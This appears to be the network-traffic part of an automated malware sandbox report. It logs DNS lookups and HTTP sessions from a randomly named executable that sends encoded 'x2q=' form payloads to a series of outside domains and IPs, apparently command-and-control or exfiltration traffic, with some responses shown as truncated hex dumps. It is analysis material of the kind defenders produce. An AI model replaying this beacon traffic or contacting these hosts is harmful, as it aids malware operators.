                                                                      Dec 10, 2024 15:15:49.029664040 CET1.1.1.1192.168.2.110x1d3fNo error (0)www.madhf.tech103.224.182.242A (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:16:03.888849020 CET1.1.1.1192.168.2.110x7c54No error (0)www.bser101pp.buzz104.21.64.1A (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:16:03.888849020 CET1.1.1.1192.168.2.110x7c54No error (0)www.bser101pp.buzz104.21.80.1A (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:16:03.888849020 CET1.1.1.1192.168.2.110x7c54No error (0)www.bser101pp.buzz104.21.16.1A (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:16:03.888849020 CET1.1.1.1192.168.2.110x7c54No error (0)www.bser101pp.buzz104.21.32.1A (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:16:03.888849020 CET1.1.1.1192.168.2.110x7c54No error (0)www.bser101pp.buzz104.21.48.1A (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:16:03.888849020 CET1.1.1.1192.168.2.110x7c54No error (0)www.bser101pp.buzz104.21.96.1A (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:16:03.888849020 CET1.1.1.1192.168.2.110x7c54No error (0)www.bser101pp.buzz104.21.112.1A (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:16:19.238435030 CET1.1.1.1192.168.2.110xe2c6No error (0)www.goldstarfootwear.shopgoldstarfootwear.shopCNAME (Canonical name)IN (0x0001)false
                                                                      Dec 10, 2024 15:16:19.238435030 CET1.1.1.1192.168.2.110xe2c6No error (0)goldstarfootwear.shop3.33.130.190A (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:16:19.238435030 CET1.1.1.1192.168.2.110xe2c6No error (0)goldstarfootwear.shop15.197.148.33A (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:16:34.812799931 CET1.1.1.1192.168.2.110x3985No error (0)www.070002018.xyz161.97.142.144A (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:16:52.082631111 CET1.1.1.1192.168.2.110x758No error (0)www.bienmaigrir.info35.220.176.144A (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:16:52.082698107 CET1.1.1.1192.168.2.110x758No error (0)www.bienmaigrir.info35.220.176.144A (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:16:52.082707882 CET1.1.1.1192.168.2.110x758No error (0)www.bienmaigrir.info35.220.176.144A (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:17:08.250941992 CET1.1.1.1192.168.2.110x4458No error (0)www.yc791022.asia101.35.209.183A (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:17:08.384809017 CET1.1.1.1192.168.2.110x4458No error (0)www.yc791022.asia101.35.209.183A (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:17:23.216521025 CET1.1.1.1192.168.2.110x29e8No error (0)www.jalan2.onlinejalan2.onlineCNAME (Canonical name)IN (0x0001)false
                                                                      Dec 10, 2024 15:17:23.216521025 CET1.1.1.1192.168.2.110x29e8No error (0)jalan2.online108.181.189.7A (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:17:38.136001110 CET1.1.1.1192.168.2.110xc8bdNo error (0)www.beyondfitness.live209.74.77.107A (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:17:53.053123951 CET1.1.1.1192.168.2.110xb9caNo error (0)www.dietcoffee.online77.68.64.45A (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:18:08.586062908 CET1.1.1.1192.168.2.110x63c5No error (0)www.smartcongress.netsmartcongress.netCNAME (Canonical name)IN (0x0001)false
                                                                      Dec 10, 2024 15:18:08.586062908 CET1.1.1.1192.168.2.110x63c5No error (0)smartcongress.net146.88.233.115A (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:18:08.587158918 CET1.1.1.1192.168.2.110x63c5No error (0)www.smartcongress.netsmartcongress.netCNAME (Canonical name)IN (0x0001)false
                                                                      Dec 10, 2024 15:18:08.587158918 CET1.1.1.1192.168.2.110x63c5No error (0)smartcongress.net146.88.233.115A (IP address)IN (0x0001)false
                                                                      Dec 10, 2024 15:18:23.711416006 CET1.1.1.1192.168.2.110x4c8dName error (3)www.alihones.lolnonenoneA (IP address)IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • www.cyperla.xyz
                                                                      • www.cstrategy.online
                                                                      • www.madhf.tech
                                                                      • www.bser101pp.buzz
                                                                      • www.goldstarfootwear.shop
                                                                      • www.070002018.xyz
                                                                      • www.bienmaigrir.info
                                                                      • www.yc791022.asia
                                                                      • www.jalan2.online
                                                                      • www.beyondfitness.live
                                                                      • www.dietcoffee.online
                                                                      • www.smartcongress.net

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.114971131.186.11.114805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:15:15.400183916 CET357OUTGET /qygv/?x2q=PNgLNtFNavTWVACj/R5fAEIERpwPFUn3Y2lvnmQ+PypmeASZv9aNxFxhHJqyS8bM8Pjr3wsa5/scE4diKg4Wx4OEfkkKpQI8CokgLA8hMMnOvrVSxnOjJsU=&Gn6D=5fNLN8qhqB3P HTTP/1.1
                                                                      Host: www.cyperla.xyz
                                                                      Accept: */*
                                                                      Accept-Language: en-us
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Dec 10, 2024 15:15:16.718899012 CET1236INHTTP/1.1 404 Not Found
                                                                      Connection: close
                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                      pragma: no-cache
                                                                      content-type: text/html
                                                                      content-length: 1251
                                                                      date: Tue, 10 Dec 2024 14:15:16 GMT
                                                                      server: LiteSpeed
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                      Dec 10, 2024 15:15:16.719014883 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                      Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.1149713194.76.119.60805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:15:33.517426014 CET632OUTPOST /qx5d/ HTTP/1.1
                                                                      Host: www.cstrategy.online
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.cstrategy.online
                                                                      Content-Length: 200
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.cstrategy.online/qx5d/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Raw: 78 32 71 3d 46 77 38 77 6f 52 36 55 79 51 6e 46 44 78 64 31 62 75 6c 54 34 6b 37 44 56 4f 49 66 61 65 35 6a 50 48 7a 4d 77 72 6e 39 48 44 47 43 56 42 75 2b 44 35 62 70 4c 42 73 74 51 71 57 68 42 33 79 6c 68 46 4e 78 2f 49 62 6b 2f 55 44 39 38 47 73 64 52 6d 4f 76 70 4a 50 58 54 2b 46 52 70 35 69 74 6d 37 77 76 4f 46 79 46 2b 4b 2b 33 47 6a 5a 32 30 4c 6e 65 68 76 4d 6a 55 33 2f 78 44 6b 50 43 58 70 57 4d 4f 6c 30 41 75 39 49 51 45 77 61 74 64 51 79 47 65 74 52 30 4e 36 6e 63 64 46 4a 65 5a 68 52 61 53 53 67 6f 36 47 43 51 4b 68 4c 6d 34 66 65 31 62 77 4f 67 51 6b 39 71 6c 4e 6c 49 5a 51 3d 3d
                                                                      Data Ascii: x2q=Fw8woR6UyQnFDxd1bulT4k7DVOIfae5jPHzMwrn9HDGCVBu+D5bpLBstQqWhB3ylhFNx/Ibk/UD98GsdRmOvpJPXT+FRp5itm7wvOFyF+K+3GjZ20LnehvMjU3/xDkPCXpWMOl0Au9IQEwatdQyGetR0N6ncdFJeZhRaSSgo6GCQKhLm4fe1bwOgQk9qlNlIZQ==
                                                                      Dec 10, 2024 15:15:34.744210005 CET391INHTTP/1.1 301 Moved Permanently
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 10 Dec 2024 14:15:34 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 178
                                                                      Connection: close
                                                                      Location: https://www.cstrategy.online/qx5d/
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.1149714194.76.119.60805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:15:36.195135117 CET652OUTPOST /qx5d/ HTTP/1.1
                                                                      Host: www.cstrategy.online
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.cstrategy.online
                                                                      Content-Length: 220
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.cstrategy.online/qx5d/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Raw: 78 32 71 3d 46 77 38 77 6f 52 36 55 79 51 6e 46 44 51 74 31 64 4a 78 54 2f 45 37 4d 4c 2b 49 66 50 75 35 5a 50 48 50 4d 77 71 7a 58 48 32 32 43 51 51 65 2b 45 34 62 70 49 42 73 74 66 4b 57 6b 63 48 7a 49 68 46 52 35 2f 4a 33 6b 2f 55 58 39 38 44 49 64 52 52 79 73 6f 5a 50 56 61 65 46 54 6e 5a 69 74 6d 37 77 76 4f 42 61 76 2b 4f 53 33 46 54 70 32 30 71 6e 64 6f 50 4d 67 64 58 2f 78 4a 45 50 34 58 70 57 79 4f 6b 70 64 75 2f 41 51 45 77 71 74 64 68 79 48 56 74 52 79 48 61 6e 49 54 6b 34 41 43 53 51 31 62 44 59 35 74 57 57 55 4c 6e 47 38 6f 38 58 69 59 6a 47 69 45 43 63 61 73 38 41 42 43 63 39 57 74 70 2b 38 2f 6b 72 42 42 33 56 2b 73 57 6d 6b 66 37 6b 3d
                                                                      Data Ascii: x2q=Fw8woR6UyQnFDQt1dJxT/E7ML+IfPu5ZPHPMwqzXH22CQQe+E4bpIBstfKWkcHzIhFR5/J3k/UX98DIdRRysoZPVaeFTnZitm7wvOBav+OS3FTp20qndoPMgdX/xJEP4XpWyOkpdu/AQEwqtdhyHVtRyHanITk4ACSQ1bDY5tWWULnG8o8XiYjGiECcas8ABCc9Wtp+8/krBB3V+sWmkf7k=
                                                                      Dec 10, 2024 15:15:37.492311954 CET391INHTTP/1.1 301 Moved Permanently
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 10 Dec 2024 14:15:37 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 178
                                                                      Connection: close
                                                                      Location: https://www.cstrategy.online/qx5d/
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.1149715194.76.119.60805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:15:38.855171919 CET1665OUTPOST /qx5d/ HTTP/1.1
                                                                      Host: www.cstrategy.online
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.cstrategy.online
                                                                      Content-Length: 1232
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.cstrategy.online/qx5d/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Raw: 78 32 71 3d 46 77 38 77 6f 52 36 55 79 51 6e 46 44 51 74 31 64 4a 78 54 2f 45 37 4d 4c 2b 49 66 50 75 35 5a 50 48 50 4d 77 71 7a 58 48 33 69 43 4d 79 47 2b 43 62 6a 70 4a 42 73 74 57 71 57 6c 63 48 79 4b 68 46 4a 39 2f 4a 72 30 2f 57 76 39 75 56 55 64 58 6c 6d 73 69 5a 50 56 58 2b 46 53 70 35 6a 6c 6d 37 67 72 4f 46 2b 76 2b 4f 53 33 46 51 78 32 39 62 6e 64 6b 76 4d 6a 55 33 2f 44 44 6b 4f 32 58 76 2b 45 4f 6b 63 71 75 75 67 51 46 51 36 74 61 43 61 48 59 74 52 77 41 61 6d 50 54 6b 30 68 43 53 4d 54 62 44 63 58 74 55 47 55 4c 51 7a 77 77 4e 48 49 4c 6a 43 32 52 52 6b 35 77 4f 6b 39 44 64 39 69 6c 35 69 74 70 6a 33 70 4d 6c 73 69 77 45 54 6c 45 73 46 6b 71 56 79 31 6f 49 32 38 59 31 79 64 68 55 73 39 5a 67 46 5a 35 72 38 61 30 32 6a 71 71 36 37 33 50 6a 67 79 57 4f 61 76 61 45 72 77 33 6d 61 4d 35 44 46 4a 45 64 74 33 6c 62 6d 76 77 71 4b 2b 34 48 4f 54 53 6c 4a 39 4b 48 2f 2f 49 35 39 62 75 56 79 54 6b 64 78 62 68 63 50 48 62 2b 66 34 2b 45 57 54 2b 4a 31 5a 4d 6c 78 55 6a 54 4e 5a 76 52 6e 76 56 2f [TRUNCATED]
                                                                      Data Ascii: x2q=Fw8woR6UyQnFDQt1dJxT/E7ML+IfPu5ZPHPMwqzXH3iCMyG+CbjpJBstWqWlcHyKhFJ9/Jr0/Wv9uVUdXlmsiZPVX+FSp5jlm7grOF+v+OS3FQx29bndkvMjU3/DDkO2Xv+EOkcquugQFQ6taCaHYtRwAamPTk0hCSMTbDcXtUGULQzwwNHILjC2RRk5wOk9Dd9il5itpj3pMlsiwETlEsFkqVy1oI28Y1ydhUs9ZgFZ5r8a02jqq673PjgyWOavaErw3maM5DFJEdt3lbmvwqK+4HOTSlJ9KH//I59buVyTkdxbhcPHb+f4+EWT+J1ZMlxUjTNZvRnvV/nuvdH5iGgtTelP0OAq8muiqft5naxElSRZGlV681jST4M4XyUSJF+iVYRWH8vNilOpB5EUB66BhppU5BX47hfetteNQfo9hj9b5EPbFJLG7FjoTua2O6M/I5Ym/VEbO4uR4mSFwy6pFG/5XbRSxe+HR38tS5I6tWxH4uJDHC4ezy1S8baLqWfSgTn62GO0mrDPIfcfhfkkISx+X/ozOX6L6OIuo4+2awV2BSdATaKIjM4TaxAQe0pUbnwAE9uO7pUfghtiYMRT4W2d15X2XIH2wbdRQXNucx6suPWCXKXW7kekH0iHADoex8uXzuItp/W7yjzRg+t6RrFnMO7iaLEMXfyuy4mdPRBVMad2p490cbFiNaBwCZVgBlWHv9n21APY8wTj6NIPUJEM5kEIvHoL864tX+EOb7CNrt/FCoQNwaooKuwILAyMe+jVCUKB+Lh56qbr19Repg7x5kqzgzuKDXat1qYlqJYJl3Omwme0LKxgqni3TlEVQgMFPP7om7l/jda3UAjixpRxmUxn6DCYj50Tt/GvajD/g+D8qWtcLCc6mFkESPlMy7kvNztKGewpho8Ro0AGoitto5huSc5/NmvUtSH5WeMaqdejgnQ+xStFhSlDYYG5LkStxI2w+sbgBU4/ixfnIL/5TyIyELbZBI4jvaeUoOwC [TRUNCATED]
                                                                      Dec 10, 2024 15:15:40.188566923 CET391INHTTP/1.1 301 Moved Permanently
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 10 Dec 2024 14:15:39 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 178
                                                                      Connection: close
                                                                      Location: https://www.cstrategy.online/qx5d/
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.1149716194.76.119.60805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:15:41.504839897 CET362OUTGET /qx5d/?x2q=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC+PuW1l2SNatEGXPklxe1J/nxX2px2UyQ1iP4/fNUbperoympu86OQyU69q5Nwob6N2bh/8=&Gn6D=5fNLN8qhqB3P HTTP/1.1
                                                                      Host: www.cstrategy.online
                                                                      Accept: */*
                                                                      Accept-Language: en-us
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Dec 10, 2024 15:15:42.821444988 CET534INHTTP/1.1 301 Moved Permanently
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 10 Dec 2024 14:15:42 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 178
                                                                      Connection: close
                                                                      Location: https://www.cstrategy.online/qx5d/?x2q=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC+PuW1l2SNatEGXPklxe1J/nxX2px2UyQ1iP4/fNUbperoympu86OQyU69q5Nwob6N2bh/8=&Gn6D=5fNLN8qhqB3P
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.1149717103.224.182.242805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:15:49.168200970 CET614OUTPOST /6ou6/ HTTP/1.1
                                                                      Host: www.madhf.tech
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.madhf.tech
                                                                      Content-Length: 200
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.madhf.tech/6ou6/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Raw: 78 32 71 3d 62 63 54 57 6e 42 30 38 56 36 2b 63 4d 79 41 43 68 48 6f 43 65 74 65 32 61 66 4b 56 76 2f 48 4a 42 49 4b 31 37 34 31 67 65 67 4c 48 2f 6f 76 38 79 71 39 2f 49 67 50 45 58 32 32 33 4e 53 30 34 50 58 50 54 4b 36 34 65 30 46 71 2f 36 78 55 78 57 64 54 42 39 57 37 6a 2f 4e 46 6c 32 4d 68 64 35 49 70 68 50 45 62 37 51 37 36 2f 4b 73 73 6b 45 57 41 4b 55 4f 78 4a 4c 50 64 67 75 67 44 77 74 44 4e 62 53 6e 71 43 6d 31 65 36 43 39 39 4a 66 78 6d 75 45 4c 4c 6d 5a 6f 79 4e 6e 64 67 46 54 53 4a 2b 36 78 4f 2f 56 6b 4e 6f 70 31 78 56 4f 58 75 49 56 53 68 66 43 6f 64 6e 38 76 51 58 2b 41 3d 3d
                                                                      Data Ascii: x2q=bcTWnB08V6+cMyAChHoCete2afKVv/HJBIK1741gegLH/ov8yq9/IgPEX223NS04PXPTK64e0Fq/6xUxWdTB9W7j/NFl2Mhd5IphPEb7Q76/KsskEWAKUOxJLPdgugDwtDNbSnqCm1e6C99JfxmuELLmZoyNndgFTSJ+6xO/VkNop1xVOXuIVShfCodn8vQX+A==
                                                                      Dec 10, 2024 15:15:50.438632011 CET871INHTTP/1.1 200 OK
                                                                      date: Tue, 10 Dec 2024 14:15:50 GMT
                                                                      server: Apache
                                                                      set-cookie: __tad=1733840150.1472258; expires=Fri, 08-Dec-2034 14:15:50 GMT; Max-Age=315360000
                                                                      vary: Accept-Encoding
                                                                      content-encoding: gzip
                                                                      content-length: 576
                                                                      content-type: text/html; charset=UTF-8
                                                                      connection: close
                                                                      Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 12 5b f2 24 3a 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 29 12 15 5e 39 dd 13 d0 a1 47 11 13 de 53 be 91 3b 79 8a c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 4f d8 d7 52 95 d1 4e 3a 70 58 69 87 8a 7e b4 da 6c 41 40 d2 10 f5 cb 3c df ef f7 d9 b3 ba fc da 0e d7 f9 fb 64 15 45 79 0e b7 48 20 81 74 87 76 20 b0 35 5c 2d 16 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 81 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed 9d 54 db 9b 29 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f e7 49 dd 8b 8b 77 c9 7c 15 1d a3 88 dc 21 30 59 a5 27 70 95 fb 36 99 10 e0 91 a6 4d fa 67 b5 37 c1 20 f3 67 a1 61 75 ff 75 d2 2c e0 e3 b3 93 cf b7 ac 43 56 e9 43 67 8d 26 cb a1 f5 32 c8 f6 78 0c cc 27 56 [TRUNCATED]
